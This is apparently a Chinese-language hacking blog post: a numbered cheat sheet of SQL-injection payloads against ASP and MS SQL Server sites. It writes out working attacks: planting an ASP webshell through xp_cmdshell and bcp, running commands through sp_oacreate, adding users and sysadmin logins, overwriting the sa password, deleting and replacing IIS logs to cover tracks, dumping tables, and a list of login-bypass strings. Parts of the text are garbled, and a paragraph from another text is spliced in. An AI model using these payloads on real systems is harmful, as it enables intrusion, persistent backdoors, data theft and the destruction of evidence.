QQ:7491805/564935欢迎高手前来交流:)
1、 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
用^转义
来写ASP文件
思路方法2、 http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
显示SQL系统版本:
Microsoft VBScript 编译器
'800a03f6' 缺少 'End'
/iisHelp/common/500-100.asp
行242 Microsoft OLE DB Provider for ODBC Drivers
'80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760
(Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation
Desktop Engine _disibledevent=>漏洞时
分明已经确定了漏洞存在却无法在这 3种漏洞中找到对应
类型偶然间我想到了在SQL语言中可以使用“in”关键字进行查询例如“select * from mytable where id in(1)”
括号中值就是我们提交数据它结果和使用“select *from mytable where id=1”
查询结果完全相同所以访问页面时候在URL后面加上“) and 1=1 and 1 in(1”后原来
SQL语句就变成了“select * from mytable where id in(1) and 1=1 and 1 in(1)”这样就会出现期待已久页面了暂且就叫这种类型
漏洞为“包含数字型”吧聪明你
定想到了还有“包含型”呢对了它就是由于类似“select * from mytable where name in(‘firstsee’)”
查询语句造成4、 http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*)
FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
判断xp_cmdshell扩展存储过程是否存在
5、 http://192.168.1.5/display.asp?keyno=188;EXEC%20master.dbo.xp_regwrite%
20'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1',
'REG_SZ','cmd.exe%20/c%20net user test ptlove /add'
向启动组中写入命令行和执行
6、 db_name">http://192.168.1.5/display.asp?keyno=188%20and%200<>db_name
查看当前
数据库名称Microsoft VBScript 编译器 '800a03f6' 缺少 'End'
/iisHelp/common/500-100.asp
行242 Microsoft OLE DB Provider for ODBC Drivers
'80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type
. /display.asp
行17 7、 列出当前所有
数据库名称:select * from master.dbo.sysdatabases8、 不需xp_cmdshell支持在有注入漏洞
SQL服务器上运行CMD命令:CREATE TABLE mytmp(info VARCHAR(400),ID
IDENTITY(1,1) NOT NULL)DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--注意run
参数true指是将等待运行结果对于类似ping长时间命令必需使用此参数EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--
fsoopentextfile思路方法将返回个textstream对象所以此时@file是个对象令牌WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
DROP TABLE MYTMP
----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs
/W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
以下是
行里面将WEB用户加到管理员组中:DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs
/W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END以下是
行中执行EXE:DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
SQL下两种执行CMD命令
思路方法:先删除7.18号日志:
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
再考贝
个其它文件来代替7.18日文件:(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
9、 用UPDATE来更新表中
数据:HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin
pwd=' a0b923820dcc509a' where username='www';--www用户密码
MD5值为:AAABBBCCCDDDEEEF即把密码改成1;10、 利用表内容导成文件功能
SQL有BCP命令
它可以把表内容导成文本文件并放到指定位置利用这项功能我们可以先建张临时表然后在表中
行行地输入个ASP木马然后用BCP命令导出形成ASP文件命令行格式如下:
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost
–U sa –P upload('S'参数为执行查询
服务器'U'参数为用户名'P'参数为密码最终上传了
个runcommand.asp木马)10、创建表、播入数据和读取数据
思路方法 创建表:
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
 往表里播入数据:
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255)
select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,
@result output insert
o cyfd (gyfd) values(@result);--' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255)
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
'SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots',
'/' ,@result output insert
o cyfd (gyfd) values(@result);-- 从表里读取数据:
' and 1=(select count(*) from cyfd where gyfd >1)--
 删除临时表:
';drop table cyfd;--
12、通过SQL语句直接更改sa
密码: update master.dbo.sysxlogins
password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA5
0CBB30267F53B9451B7189CA67AF19A1FC
where sid=0x01,这样sa
密码就被我们改成了111111拉呵呵
解决思路方法就是把sa给删拉如何删可以参考我
完全删除sa这个后门
 查看本机所有
数据库用户名:select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins
 更改sa口令思路方法:用sql综合利用工具连接后
执行命令:exec sp_password NULL,'新密码','sa'
13、查询dvbbs库中所有
表名和表结构 select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
 select * from dvbbs.dbo.syscolumns where id=1426104121
14、手工备份当前数据库
完全备份:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name
,@s='c:/db1' backup database @a to disk=@s WITH formAT--
差异备份:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name
,@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT—
15、添加和删除
个SA权限用户testexec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
cmd.exe /c isql -E /U alma /P /i K:\test.qry
16、select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
就可以列出库ChouYFD中所有
用户建立表名Select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0
17、
 http://www.test.cn/zgrdw/common/
image_view.jsp?sqlstr=select%20*%20from
%20rdweb.dbo.syscolumns (where id=1234)
列出rdweb库中所有表中
字段名称 select * from dvbbs.dbo.syscolumns where id=5575058
列出库dvbbs中表id=5575058
所有字段名18、删除记录命令:delete from Dv_topic where boardid=5 and topicid=7978
19、绕过登录验证进入后台
思路方法整理:1)' or''='
2) ' or 1=1--
3) ‘ or ‘a’=’a--
4) ‘or’=’or’
5) " or 1=1--
6)or 1=1--
7) or ’a=’a
8)" or "a"="a
9) ’) or (’a’=’a
10) ") or ("a"="a
11) ) or (1=1
20、查看WEB网站WebSite安装目录命令:
 cscript c:\inetpub\
adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt
type c:\test1.txt
del c:\test1.txt
在NBSI下可以直接显示运行结果
所以不用导出到文件 篇文章: NTFS下做次幽灵(突破读写权限)篇文章: 推荐:加密故事
最新评论